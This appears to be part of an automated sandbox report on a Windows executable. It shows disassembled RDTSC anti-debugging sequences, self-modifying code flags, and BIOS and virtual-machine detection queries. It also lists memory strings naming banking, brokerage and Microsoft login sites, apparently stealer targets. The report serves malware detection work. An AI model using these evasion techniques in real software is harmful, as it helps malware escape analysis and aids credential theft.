Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0298 second address: 53A029D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A029D second address: 53A0317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD32D43E4C6h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD32D43E28Fh 0x00000016 xor cx, 492Eh 0x0000001b jmp 00007FD32D43E299h 0x00000020 popfd 0x00000021 pushad 0x00000022 mov edi, eax 0x00000024 mov dx, ax 0x00000027 popad 0x00000028 popad 0x00000029 lea ecx, dword ptr [ebp-14h] 0x0000002c jmp 00007FD32D43E294h 0x00000031 mov dword ptr [ebp-14h], edi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD32D43E297h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0340 second address: 53A0386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50BA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD32CC50BA2h 0x0000000f xor cl, FFFFFFF8h 0x00000012 jmp 00007FD32CC50B9Bh 0x00000017 popfd 0x00000018 popad 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov eax, edi 0x0000001f mov esi, ebx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0386 second address: 53A038C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A038C second address: 53A0390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0390 second address: 53A03A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD32D43E28Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0422 second address: 53A043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD32CC50BA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A043A second address: 53A043E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A043E second address: 53A049B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FD39D8FEBDCh 0x0000000e jmp 00007FD32CC50BA7h 0x00000013 js 00007FD32CC50C19h 0x00000019 jmp 00007FD32CC50BA6h 0x0000001e cmp dword ptr [ebp-14h], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD32CC50BA7h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A05BE second address: 53A05F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD32D43E293h 0x0000000a add cx, E20Eh 0x0000000f jmp 00007FD32D43E299h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A06A2 second address: 53A06AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A06AA second address: 5390DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007FD39E0EC22Ah 0x0000000d xor eax, eax 0x0000000f jmp 00007FD32D4179BAh 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pop ebx 0x00000017 leave 0x00000018 retn 0004h 0x0000001b nop 0x0000001c sub esp, 04h 0x0000001f mov esi, eax 0x00000021 cmp esi, 00000000h 0x00000024 setne al 0x00000027 xor ebx, ebx 0x00000029 test al, 01h 0x0000002b jne 00007FD32D43E287h 0x0000002d jmp 00007FD32D43E3C3h 0x00000032 call 00007FD331D4FF69h 0x00000037 mov edi, edi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c mov bh, ADh 0x0000003e pushfd 0x0000003f jmp 00007FD32D43E294h 0x00000044 sbb eax, 1DFDE2A8h 0x0000004a jmp 00007FD32D43E28Bh 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 5390DAD second address: 5390DEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD32CC50B9Ah 0x00000012 adc cx, D508h 0x00000017 jmp 00007FD32CC50B9Bh 0x0000001c popfd 0x0000001d mov ch, DFh 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD32CC50BA1h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 5390DEC second address: 5390E6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ax, 5FF3h 0x0000000f pushfd 0x00000010 jmp 00007FD32D43E298h 0x00000015 and cx, 34F8h 0x0000001a jmp 00007FD32D43E28Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007FD32D43E296h 0x00000028 xchg eax, ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov esi, edi 0x0000002e call 00007FD32D43E299h 0x00000033 pop esi 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 5390E6B second address: 5390E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD32CC50B9Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 5390E7C second address: 5390EA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD32D43E28Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 5390EA2 second address: 5390EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50B9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FD32CC50B9Bh 0x00000012 pushfd 0x00000013 jmp 00007FD32CC50BA8h 0x00000018 xor si, D8D8h 0x0000001d jmp 00007FD32CC50B9Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 5390F3A second address: 5390F40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 5390F40 second address: 5390F78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD32CC50B9Eh 0x00000009 jmp 00007FD32CC50BA5h 0x0000000e popfd 0x0000000f mov bl, ch 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 leave 0x00000015 pushad 0x00000016 mov edi, 6D2CBB6Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d mov dh, 1Ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 5390F78 second address: 53A0ADF instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 ret 0x00000009 nop 0x0000000a jmp 00007FD32D43E282h 0x0000000c and bl, 00000001h 0x0000000f movzx eax, bl 0x00000012 add esp, 3Ch 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 pop ebp 0x00000019 ret 0x0000001a add esp, 04h 0x0000001d mov eax, dword ptr [00A93010h+ebx*4] 0x00000024 mov ecx, 3C17A731h 0x00000029 xor ecx, dword ptr [00A93018h] 0x0000002f add eax, ecx 0x00000031 inc eax 0x00000032 jmp eax 0x00000034 mov eax, dword ptr [00A9301Ch] 0x00000039 mov ecx, EB7ED259h 0x0000003e xor ecx, dword ptr [00A93024h] 0x00000044 add eax, ecx 0x00000046 inc eax 0x00000047 jmp eax 0x00000049 push edi 0x0000004a call 00007FD32D469FB0h 0x0000004f push ebp 0x00000050 push ebx 0x00000051 push edi 0x00000052 push esi 0x00000053 sub esp, 44h 0x00000056 push 00000000h 0x00000058 call 00007FD331D5FC91h 0x0000005d mov edi, edi 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FD32D43E291h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0ADF second address: 53A0AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0AE5 second address: 53A0B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov cl, E0h 0x0000000f mov bx, 1934h 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FD32D43E28Ah 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0B19 second address: 53A0B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0B1D second address: 53A0B23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0B23 second address: 53A0B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD32CC50B9Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0B32 second address: 53A0B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FD32D43E28Eh 0x00000012 cmp dword ptr [760A459Ch], 05h 0x00000019 jmp 00007FD32D43E290h 0x0000001e je 00007FD39E0DC10Dh 0x00000024 pushad 0x00000025 mov bx, ax 0x00000028 mov di, si 0x0000002b popad 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FD32D43E28Bh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0C12 second address: 53A0C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD32CC50B9Fh 0x00000009 sub esi, 0DF381BEh 0x0000000f jmp 00007FD32CC50BA9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FD32CC50BA0h 0x0000001b or esi, 33CA6AB8h 0x00000021 jmp 00007FD32CC50B9Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a sub esi, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FD32CC50BA1h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0C82 second address: 53A0C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0CD7 second address: 53A0D52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD32CC50B9Fh 0x00000008 jmp 00007FD32CC50BA8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test al, al 0x00000012 jmp 00007FD32CC50BA0h 0x00000017 je 00007FD39D8E4805h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov si, di 0x00000023 pushfd 0x00000024 jmp 00007FD32CC50BA9h 0x00000029 xor ah, 00000036h 0x0000002c jmp 00007FD32CC50BA1h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0BA1 second address: 53B0BB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov ax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0BB3 second address: 53B0BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0BB7 second address: 53B0BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E28Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0BC6 second address: 53B0C68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 2A76DDBAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007FD32CC50BA7h 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FD32CC50BA4h 0x0000001e and ecx, 1BCF3158h 0x00000024 jmp 00007FD32CC50B9Bh 0x00000029 popfd 0x0000002a push eax 0x0000002b mov di, D47Ah 0x0000002f pop edi 0x00000030 popad 0x00000031 xchg eax, esi 0x00000032 pushad 0x00000033 movzx eax, di 0x00000036 pushad 0x00000037 mov cx, di 0x0000003a mov ecx, ebx 0x0000003c popad 0x0000003d popad 0x0000003e push eax 0x0000003f jmp 00007FD32CC50B9Ch 0x00000044 xchg eax, esi 0x00000045 jmp 00007FD32CC50BA0h 0x0000004a mov esi, dword ptr [ebp+0Ch] 0x0000004d pushad 0x0000004e mov si, di 0x00000051 popad 0x00000052 test esi, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FD32CC50BA1h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0C68 second address: 53B0C7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0C7D second address: 53B0CB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50BA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD39D8DE2BBh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FD32CC50BA9h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0CB7 second address: 53B0CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0CBD second address: 53B0CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0CC1 second address: 53B0CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0CC5 second address: 53B0D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [760A459Ch], 05h 0x0000000f jmp 00007FD32CC50B9Fh 0x00000014 je 00007FD39D8F634Ah 0x0000001a jmp 00007FD32CC50BA6h 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD32CC50BA7h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0D19 second address: 53B0D2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0D4C second address: 53B0D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0D52 second address: 53B0D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0D56 second address: 53B0D98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD32CC50BA7h 0x00000012 sub ah, 0000002Eh 0x00000015 jmp 00007FD32CC50BA9h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0D98 second address: 53B0DBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD32D43E28Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0DBF second address: 53B0DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0DC5 second address: 53B0DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0E18 second address: 53B0E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\CgmaT61.exe	Special instruction interceptor: First address: AA5BC5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CgmaT61.exe	Special instruction interceptor: First address: AA36D6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CgmaT61.exe	Special instruction interceptor: First address: C6CB4B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CgmaT61.exe	Special instruction interceptor: First address: CCDD24 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\CgmaT61.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\CgmaT61.exe

Code function: 0_2_00AA2000 rdtsc

0_2_00AA2000

Source: C:\Users\user\Desktop\CgmaT61.exe TID: 5612	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe TID: 1420	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\CgmaT61.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: CgmaT61.exe, CgmaT61.exe, 00000000.00000002.1157653421.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: CgmaT61.exe, 00000000.00000003.988397755.0000000005DE7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: CgmaT61.exe, 00000000.00000003.1077530617.0000000001696000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000002.1158242294.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.959047272.0000000001696000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1050910887.0000000001696000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157182659.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000002.1158333150.0000000001696000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: CgmaT61.exe, 00000000.00000002.1157653421.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
